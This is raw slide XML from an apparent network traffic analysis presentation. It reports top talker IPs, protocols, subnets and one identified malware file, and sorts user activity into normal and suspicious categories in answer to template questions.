        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731368" y="5801542"/>
            <a:ext cx="22914900" cy="21129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lang="en-US"/>
              <a:t>Traffic Profile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37" name="Google Shape;537;p6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Traffic Profile</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="543" name="Google Shape;543;p7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44" name="Google Shape;544;p7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1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Our analysis identified the following characteristics of the traffic on the network: </a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="545" name="Google Shape;545;p70"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1176950" y="3022475"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{962B4CB7-2BE8-4553-86C2-8896E5BEEF5F}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331875"/>
                <a:gridCol w="7331875"/>
              </a:tblGrid>
              <a:tr h="1170000">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Feature</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="44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Value</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="44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1274950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Top Talkers (IP Addresses)</a:t>
                      </a:r>
                      <a:endParaRPr sz="32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200"/>
                        <a:t>172.16.4.205 (31.6%)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>185.243.115.84 (18.1%)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>10.0.0.201 (16.1%)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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700">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Machines that sent the most traffic.</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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114450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Most Common Protocols</a:t>
                      </a:r>
                      <a:endParaRPr sz="32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200"/>
                        <a:t>TCP (89.0%)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>UDP (10.9%)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>NONE (.1%)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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700">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Three most common protocols on the network.</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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274950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t># of Unique IP Addresses</a:t>
                      </a:r>
                      <a:endParaRPr sz="32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200"/>
                        <a:t>831 (IPv4)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>11 (IPv6)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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700">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Count of observed IP addresses.</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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274950">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Subnets </a:t>
                      </a:r>
                      <a:endParaRPr sz="32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200"/>
                        <a:t>10.6.12.0/24</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>172.16.4.0/24</a:t>
                      </a:r>
                      <a:endParaRPr sz="3200"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200"/>
                        <a:t>10.0.0.0/24</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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700">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Observed subnet ranges.</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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114450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="3200">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t># of Malware Species</a:t>
                      </a:r>
                      <a:endParaRPr sz="32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sz="3200"/>
                        <a:t>1 (june11.dll)</a:t>
                      </a:r>
                      <a:endParaRPr sz="3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2700">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Number of malware binaries identified in traffic.</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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Behavioral Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Google Shape;552;p71"/>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b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Purpose of Traffic on the Network</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="Google Shape;553;p7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54" name="Google Shape;554;p71"/>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555" name="Google Shape;555;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377700" cy="9551100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Users were observed engaging in the following kinds of activity.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Normal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Activity</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-428307" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Watching YouTube</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-428307" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online Shopping from Amazon</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-428307" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="91291"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DHCP Requests</a:t>
            </a:r>
            <a:endParaRPr sz="4052">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-428307" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Downloading and Installing Desktop Wallpapers</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suspicious Activity</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-428307" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="2100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malware Download</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-428307" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malware Outbound Traffic</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-428307" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Torrent Downloads</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="556" name="Google Shape;556;p71"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="15679425" y="8447209"/>
            <a:ext cx="7966775" cy="4663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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="731368" y="5349367"/>
            <a:ext cx="22914900" cy="21129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lang="en-US"/>
              <a:t>Normal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62" name="Google Shape;562;p7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Web Browsing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="Google Shape;569;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1802600"/>
            <a:ext cx="24377700" cy="972900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="243750">
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="11600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Summarize the following:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="11600">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="275"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="3200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="Google Shape;570;p7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71" name="Google Shape;571;p73"/>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572" name="Google Shape;572;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="467" y="3424667"/>
            <a:ext cx="24377700" cy="9551100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2437975" lIns="1219000" spcFirstLastPara="1" rIns="1219000" wrap="square" tIns="0">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-445928" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What kind of traffic did you observe? Which protocol(s)?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-445928" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We observed majority of the HTTP traffic on port 80.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-445928" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>What, specifically, was the user doing? Which site were they browsing? Etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-445928" lvl="1" marL="914400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FF0000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The network users did the following during office hours:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-445928" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Downloading files from website such as:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://detectportal.firefox.com/success.txt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-445928" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uploading files to a website such as: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://mysocalledchaos.com/wp-content/upload/2018/02/Beauty.jpg</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-445928" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Online shopping at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
